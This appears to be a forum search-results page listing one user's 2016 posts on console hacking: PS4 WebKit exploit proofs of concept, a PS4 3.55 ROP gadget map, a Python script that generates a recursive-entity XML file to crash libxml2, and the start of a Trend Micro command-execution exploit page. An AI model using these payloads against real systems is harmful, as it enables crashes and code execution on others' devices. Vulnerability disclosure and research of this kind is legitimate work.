Search found 8 matches
- Fri Oct 14, 2016 3:08 pm
- Forum: Programming and Security
- Topic: PS4 4.01 Webkit Exploits ( POC , no ROP yet)
- Replies: 2
- Views: 15243
PS4 4.01 Webkit Exploits ( POC , no ROP yet)
This repository contains all the WebKit Vulnerabilities that affect the PS4 on version 4.01 ( Not tested on lower versions, but could be ported with enough development). Keep in mind that it's not a ROP, so it won't give you access to SysModules, Dumping, FSBrowsing and all that. It's just a Proof O...
- Thu Sep 29, 2016 4:59 am
- Forum: Programming and Security
- Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
- Replies: 3
- Views: 12166
- Wed Sep 28, 2016 5:09 pm
- Forum: Programming and Security
- Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
- Replies: 3
- Views: 12166
PS4 3.55 Updated and more extensive Gadget List.
gadgetMap = { 'PlayStation 4 3.55': { 'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f), 'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c), 'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40), 'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99), 'sysca...
- Wed Sep 28, 2016 5:07 pm
- Forum: Programming and Security
- Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
- Replies: 3
- Views: 12166
PS4 3.55 Full Browser FileSystem and extensive Gadget list
d /. d /.. d /dev c /dev/dipsw c /dev/dmem0 c /dev/dmem1 c /dev/dmem2 c /dev/ctty c /dev/deci_stdout c /dev/deci_stderr c /dev/deci_tty2 c /dev/deci_tty3 c /dev/deci_tty4 c /dev/deci_tty5 c /dev/deci_tty6 c /dev/deci_tty7 c /dev/deci_ttya0 c /dev/deci_ttyb0 c /dev/deci_ttyc0 c /dev/deci_stdin c /de...
- Wed May 04, 2016 6:06 am
- Forum: Programming and Security
- Topic: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
- Replies: 9
- Views: 12028
Re: Libxml2 exploit poc, possible ps4 port?
Script:
#!/bin/python3
f = open('repo.xml', 'w')
f.write( "<!DOCTYPE a [ ")
i = 1
while (i < 30000):
    f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
    i = i+1
f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")
f.close()
- Wed May 04, 2016 6:05 am
- Forum: Programming and Security
- Topic: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
- Replies: 9
- Views: 12028
Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
Hi This is a disclosure of the following issue that was raised a week ago on the distro's mailing list. Both bugs on the gnome bugtracker are currently private and should be made public now. A couple of weeks back while working on a related bug [CVE-2016-3627] I discovered a specially created xml fi...
- Mon Jan 11, 2016 10:53 pm
- Forum: Programming and Security
- Topic: Possible PS4 3.11 Out of Bound Read (Freetype 64bit exploit)
- Replies: 2
- Views: 11549
Possible PS4 3.11 Out of Bound Read (Freetype 64bit exploit)
Source: https://code.google.com/p/google-security-research/issues/detail?id=614 The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compile...
- Mon Jan 11, 2016 10:49 pm
- Forum: Programming and Security
- Topic: PS Vita Command Execution through Trend Micro (exploit)
- Replies: 3
- Views: 4325
PS Vita Command Execution through Trend Micro (exploit)
<html> <head> <title>Trend Micro Exploit</title> </head> <body> <p> Sample exploit for Trend Micro . <p> <p> Command: <input id="command" value="insert command here" size="64"> <p> <a href="javascript:begin()">Click Here</a> to run the command above <p> <img src="http://reactiongifs.us/wp-content/up...